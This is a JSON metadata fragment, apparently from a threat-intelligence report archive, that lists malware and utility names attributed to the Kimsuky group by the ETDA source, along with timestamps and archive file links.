"source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439060, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/930cc42115fcbd879cf67403b12c3a3e4e347abe.pdf", "text": "https://archive.orkl.eu/930cc42115fcbd879cf67403b12c3a3e4e347abe.txt", "img": "https://archive.orkl.eu/930cc42115fcbd879cf67403b12c3a3e4e347abe.jpg" } }